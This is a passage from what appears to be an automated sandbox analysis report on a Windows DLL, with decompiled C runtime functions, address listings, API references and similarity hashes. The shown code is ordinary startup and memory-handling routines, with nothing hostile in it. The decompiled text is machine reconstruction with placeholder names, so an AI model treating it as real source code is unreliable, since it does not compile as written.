						_t45 = E736D6490( *((intOrPtr*)(_t47 + 8)), _t42);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E736D6490( *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E736D700B(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E736D71C6( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E736D6EB1(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E736D71C6( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x736ef120 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}













                                                                                                                                                                                                                                0x736d70bb
                                                                                                                                                                                                                                0x736d70bb
                                                                                                                                                                                                                                0x736d70bd
                                                                                                                                                                                                                                0x736d70c2
                                                                                                                                                                                                                                0x736d70c7
                                                                                                                                                                                                                                0x736d70cc
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70e1
                                                                                                                                                                                                                                0x736d70e4
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70fd
                                                                                                                                                                                                                                0x736d70ff
                                                                                                                                                                                                                                0x736d7102
                                                                                                                                                                                                                                0x736d7104
                                                                                                                                                                                                                                0x736d71ad
                                                                                                                                                                                                                                0x736d71ad
                                                                                                                                                                                                                                0x736d71b4
                                                                                                                                                                                                                                0x736d71b6
                                                                                                                                                                                                                                0x736d71b9
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d710f
                                                                                                                                                                                                                                0x736d7114
                                                                                                                                                                                                                                0x736d7116
                                                                                                                                                                                                                                0x736d7119
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d712b
                                                                                                                                                                                                                                0x736d712d
                                                                                                                                                                                                                                0x736d7130
                                                                                                                                                                                                                                0x736d7133
                                                                                                                                                                                                                                0x736d7135
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d7139
                                                                                                                                                                                                                                0x736d713e
                                                                                                                                                                                                                                0x736d7143
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d714b
                                                                                                                                                                                                                                0x736d714c
                                                                                                                                                                                                                                0x736d7151
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d715c
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d7165
                                                                                                                                                                                                                                0x736d716f
                                                                                                                                                                                                                                0x736d7171
                                                                                                                                                                                                                                0x736d7174
                                                                                                                                                                                                                                0x736d7176
                                                                                                                                                                                                                                0x736d7182
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3136044242-0
                                                                                                                                                                                                                                • Opcode ID: f69d82640cb2618b1f393baf875ff620fb233056fe885475575e5e21c5e0934b
                                                                                                                                                                                                                                • Instruction ID: 5a2ad8b875ffc1c13fee5f14ed6d5ee3781db45e6ff914c0eecdffea6052697a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f69d82640cb2618b1f393baf875ff620fb233056fe885475575e5e21c5e0934b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A216D72D21625AFEF228E55CD40F6F7F79EB80A90F094629E816562D4D6308D028BE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D9DEA, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D9DEA(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t5;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x736eb050; // 0x7
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E736DBC10(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t5 = E736DA236(1, 0x364); // executed
						_t18 = _t5;
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E736DBC10(__eflags,  *0x736eb050, _t18);
							if(__eflags != 0) {
								E736D9A91(_t18, 0x736efafc);
								E736DA293(0);
								goto L13;
							} else {
								_t13 = 0;
								E736DBC10(__eflags,  *0x736eb050, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E736DBC10(0,  *0x736eb050, 0);
							_push(0);
							L9:
							E736DA293();
							goto L4;
						}
					}
				} else {
					_t18 = E736DBBD1(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x736eb050; // 0x7
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}









                                                                                                                                                                                                                                0x736d9df5
                                                                                                                                                                                                                                0x736d9df7
                                                                                                                                                                                                                                0x736d9dfc
                                                                                                                                                                                                                                0x736d9dff
                                                                                                                                                                                                                                0x736d9e1d
                                                                                                                                                                                                                                0x736d9e20
                                                                                                                                                                                                                                0x736d9e25
                                                                                                                                                                                                                                0x736d9e27
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e29
                                                                                                                                                                                                                                0x736d9e30
                                                                                                                                                                                                                                0x736d9e35
                                                                                                                                                                                                                                0x736d9e39
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e60
                                                                                                                                                                                                                                0x736d9e62
                                                                                                                                                                                                                                0x736d9e7b
                                                                                                                                                                                                                                0x736d9e82
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e64
                                                                                                                                                                                                                                0x736d9e64
                                                                                                                                                                                                                                0x736d9e6d
                                                                                                                                                                                                                                0x736d9e72
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e72
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e46
                                                                                                                                                                                                                                0x736d9e4b
                                                                                                                                                                                                                                0x736d9e4c
                                                                                                                                                                                                                                0x736d9e4c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e51
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e01
                                                                                                                                                                                                                                0x736d9e07
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e18
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e0d
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e8d
                                                                                                                                                                                                                                0x736d9e95
                                                                                                                                                                                                                                0x736d9e9e

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000001,736DA228,736DA2B9,?,?,736D94E3), ref: 736D9DEF
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9E4C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9E82
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000007,000000FF,?,00000001,736DA228,736DA2B9,?,?,736D94E3), ref: 736D9E8D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2283115069-0
                                                                                                                                                                                                                                • Opcode ID: 2114873e75f4510dcb69ee662b3dc4e80ac427be31634503da50bf18635ef86d
                                                                                                                                                                                                                                • Instruction ID: a3292ceadf456f39e1371fda9e56ad2405294d444ba4aefc0b9fc455f3a4df56
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2114873e75f4510dcb69ee662b3dc4e80ac427be31634503da50bf18635ef86d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A11C6336693053BEF0222A78D84F1B22A9BFC2671B280328F129971C5FE618C154128
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DB00D, Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                                                                                                			E736DB00D(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t39;
				void* _t40;
				char _t48;
				char _t51;
				char _t58;
				signed int _t64;
				void* _t76;
				void* _t81;
				signed int _t86;

				_t79 = __edx;
				_push(_a16);
				_push(_a12);
				E736DB128(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				_t39 = E736DADB2(__eflags, _a4);
				_v16 = _t39;
				if(_t39 ==  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t40 = E736DC5DF(0x220); // executed
				_t81 = _t40;
				_t64 = __ebx | 0xffffffff;
				__eflags = _t81;
				if(__eflags == 0) {
					L5:
					_t86 = _t64;
					goto L6;
				} else {
					_t81 = memcpy(_t81,  *(_a12 + 0x48), 0x88 << 2);
					 *_t81 =  *_t81 & 0x00000000;
					_t86 = E736DB219(_t79, __eflags, _v16, _t81);
					__eflags = _t86 - _t64;
					if(__eflags != 0) {
						__eflags = _a8;
						if(_a8 == 0) {
							E736DC870();
						}
						asm("lock xadd [eax], ebx");
						_t66 = _t64 == 1;
						__eflags = _t64 == 1;
						if(_t64 == 1) {
							_t58 = _a12;
							__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x736eb060;
							if( *((intOrPtr*)(_t58 + 0x48)) != 0x736eb060) {
								E736DA293( *((intOrPtr*)(_t58 + 0x48)));
							}
						}
						 *_t81 = 1;
						_t76 = _t81;
						_t81 = 0;
						 *(_a12 + 0x48) = _t76;
						_t48 = _a12;
						__eflags =  *(_t48 + 0x350) & 0x00000002;
						if(( *(_t48 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x736eb6f0 & 0x00000001;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t51 = 5;
								_v16 = _t51;
								_v12 = _t51;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E736DACAE(_t66, 0, _t86, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x736eb63c =  *_a16;
								}
							}
						}
						L6:
						E736DA293(_t81);
						return _t86;
					} else {
						 *((intOrPtr*)(E736DA223(__eflags))) = 0x16;
						goto L5;
					}
				}
			}


















                                                                                                                                                                                                                                0x736db00d
                                                                                                                                                                                                                                0x736db015
                                                                                                                                                                                                                                0x736db018
                                                                                                                                                                                                                                0x736db01b
                                                                                                                                                                                                                                0x736db023
                                                                                                                                                                                                                                0x736db02e
                                                                                                                                                                                                                                0x736db037
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736db039
                                                                                                                                                                                                                                0x736db03d
                                                                                                                                                                                                                                0x736db03e
                                                                                                                                                                                                                                0x736db03f
                                                                                                                                                                                                                                0x736db045
                                                                                                                                                                                                                                0x736db04a
                                                                                                                                                                                                                                0x736db04c
                                                                                                                                                                                                                                0x736db050
                                                                                                                                                                                                                                0x736db052
                                                                                                                                                                                                                                0x736db082
                                                                                                                                                                                                                                0x736db082
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736db054
                                                                                                                                                                                                                                0x736db061
                                                                                                                                                                                                                                0x736db067
                                                                                                                                                                                                                                0x736db06f
                                                                                                                                                                                                                                0x736db073
                                                                                                                                                                                                                                0x736db075
                                                                                                                                                                                                                                0x736db094
                                                                                                                                                                                                                                0x736db098
                                                                                                                                                                                                                                0x736db09a
                                                                                                                                                                                                                                0x736db09a
                                                                                                                                                                                                                                0x736db0a5
                                                                                                                                                                                                                                0x736db0a9
                                                                                                                                                                                                                                0x736db0a9
                                                                                                                                                                                                                                0x736db0aa
                                                                                                                                                                                                                                0x736db0ac
                                                                                                                                                                                                                                0x736db0af
                                                                                                                                                                                                                                0x736db0b6
                                                                                                                                                                                                                                0x736db0bb
                                                                                                                                                                                                                                0x736db0c0
                                                                                                                                                                                                                                0x736db0b6
                                                                                                                                                                                                                                0x736db0c1
                                                                                                                                                                                                                                0x736db0c7
                                                                                                                                                                                                                                0x736db0cc
                                                                                                                                                                                                                                0x736db0ce
                                                                                                                                                                                                                                0x736db0d1
                                                                                                                                                                                                                                0x736db0d4
                                                                                                                                                                                                                                0x736db0db
                                                                                                                                                                                                                                0x736db0dd
                                                                                                                                                                                                                                0x736db0e4
                                                                                                                                                                                                                                0x736db0e9
                                                                                                                                                                                                                                0x736db0f4
                                                                                                                                                                                                                                0x736db0f7
                                                                                                                                                                                                                                0x736db0f8
                                                                                                                                                                                                                                0x736db0fb
                                                                                                                                                                                                                                0x736db101
                                                                                                                                                                                                                                0x736db105
                                                                                                                                                                                                                                0x736db109
                                                                                                                                                                                                                                0x736db10a
                                                                                                                                                                                                                                0x736db10f
                                                                                                                                                                                                                                0x736db113
                                                                                                                                                                                                                                0x736db11e
                                                                                                                                                                                                                                0x736db11e
                                                                                                                                                                                                                                0x736db113
                                                                                                                                                                                                                                0x736db0e4
                                                                                                                                                                                                                                0x736db084
                                                                                                                                                                                                                                0x736db085
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736db077
                                                                                                                                                                                                                                0x736db07c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736db07c
                                                                                                                                                                                                                                0x736db075

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DADB2: GetOEMCP.KERNEL32(00000000,736DB028,?,00000001,736DE432,736DE432,00000001,?,?), ref: 736DADDD
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DB085
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DB0BB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                • Opcode ID: 466c2e69632e5bab425e7790b983c2df2aa5c3f3588fc8f0b1ecae84679c51a1
                                                                                                                                                                                                                                • Instruction ID: b88eef880e8eb65c59fb36a4c5241975a3c2521aeaa554663a6a0ddaa5fec635
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 466c2e69632e5bab425e7790b983c2df2aa5c3f3588fc8f0b1ecae84679c51a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F31B072818309AFDF01DF69D840B9E7BB5FF44310F140169E925972D4EB329E50CB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D6F04, Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                                                                                			E736D6F04(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E736D7870(__ebx, __edi, __esi);
				_t43 = E736D754E(__ecx, __edx, 0); // executed
				_t90 = 0x736e99e8;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E736D7453();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x736ef460;
					if( *0x736ef460 != 0) {
						E736D76ED(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x736e9a08);
						E736D7870(1, __edi, __esi);
						_t48 =  *0x736ef120; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x736ef120 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E736D7453();
							 *(_t123 - 4) = 1;
							__eflags =  *0x736ef460 - 2;
							if( *0x736ef460 != 2) {
								E736D76ED(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x736e9a30);
								E736D7870(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E736D71C6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E736D6EB1(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_t115 = E736D6490( *((intOrPtr*)(_t123 + 8)), _t110);
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_t59 = E736D6490( *((intOrPtr*)(_t123 + 8)), _t56);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E736D71C6( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E736D6EB1(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E736D71C6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x736ef120 - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E736D751E(1, _t90, 1, _t113);
								E736D73DA();
								E736D783C();
								 *0x736ef460 =  *0x736ef460 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E736D70A0();
								_t67 = E736D76BF( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E736D70AD();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x736ef460 = 1;
						if(E736D74B0(_t132) != 0) {
							E736D73CE(E736D7810());
							E736D73F2();
							_t80 = E736D8A97(0x736e1114, 0x736e1124);
							_pop(_t102);
							if(_t80 == 0 && E736D7485(1, _t102) != 0) {
								E736D8A50(_t102, 0x736e1108, 0x736e1110);
								 *0x736ef460 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E736D6FE7();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E736D76E7();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E736D760E(_t85, _t106, _t121, _t138) != 0) {
									 *0x736e1104( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x736ef120 =  *0x736ef120 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}




















                                                                                                                                                                                                                                0x736d6f04
                                                                                                                                                                                                                                0x736d6f04
                                                                                                                                                                                                                                0x736d6f04
                                                                                                                                                                                                                                0x736d6f04
                                                                                                                                                                                                                                0x736d6f0b
                                                                                                                                                                                                                                0x736d6f12
                                                                                                                                                                                                                                0x736d6f17
                                                                                                                                                                                                                                0x736d6f1a
                                                                                                                                                                                                                                0x736d6ff1
                                                                                                                                                                                                                                0x736d6ff1
                                                                                                                                                                                                                                0x736d6ff1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6f20
                                                                                                                                                                                                                                0x736d6f25
                                                                                                                                                                                                                                0x736d6f28
                                                                                                                                                                                                                                0x736d6f2a
                                                                                                                                                                                                                                0x736d6f2d
                                                                                                                                                                                                                                0x736d6f31
                                                                                                                                                                                                                                0x736d6f38
                                                                                                                                                                                                                                0x736d7005
                                                                                                                                                                                                                                0x736d700a
                                                                                                                                                                                                                                0x736d700b
                                                                                                                                                                                                                                0x736d700d
                                                                                                                                                                                                                                0x736d7012
                                                                                                                                                                                                                                0x736d7017
                                                                                                                                                                                                                                0x736d701c
                                                                                                                                                                                                                                0x736d701e
                                                                                                                                                                                                                                0x736d7025
                                                                                                                                                                                                                                0x736d702d
                                                                                                                                                                                                                                0x736d7030
                                                                                                                                                                                                                                0x736d7039
                                                                                                                                                                                                                                0x736d703c
                                                                                                                                                                                                                                0x736d703f
                                                                                                                                                                                                                                0x736d7046
                                                                                                                                                                                                                                0x736d70b5
                                                                                                                                                                                                                                0x736d70ba
                                                                                                                                                                                                                                0x736d70bb
                                                                                                                                                                                                                                0x736d70bd
                                                                                                                                                                                                                                0x736d70c2
                                                                                                                                                                                                                                0x736d70c7
                                                                                                                                                                                                                                0x736d70ca
                                                                                                                                                                                                                                0x736d70cc
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70dd
                                                                                                                                                                                                                                0x736d70e1
                                                                                                                                                                                                                                0x736d70e4
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70f0
                                                                                                                                                                                                                                0x736d70fd
                                                                                                                                                                                                                                0x736d70ff
                                                                                                                                                                                                                                0x736d7102
                                                                                                                                                                                                                                0x736d7104
                                                                                                                                                                                                                                0x736d710f
                                                                                                                                                                                                                                0x736d7114
                                                                                                                                                                                                                                0x736d7116
                                                                                                                                                                                                                                0x736d7119
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d711b
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e6
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d70eb
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d7121
                                                                                                                                                                                                                                0x736d712b
                                                                                                                                                                                                                                0x736d712d
                                                                                                                                                                                                                                0x736d7130
                                                                                                                                                                                                                                0x736d7133
                                                                                                                                                                                                                                0x736d7135
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d7139
                                                                                                                                                                                                                                0x736d713e
                                                                                                                                                                                                                                0x736d7143
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d714b
                                                                                                                                                                                                                                0x736d714c
                                                                                                                                                                                                                                0x736d7151
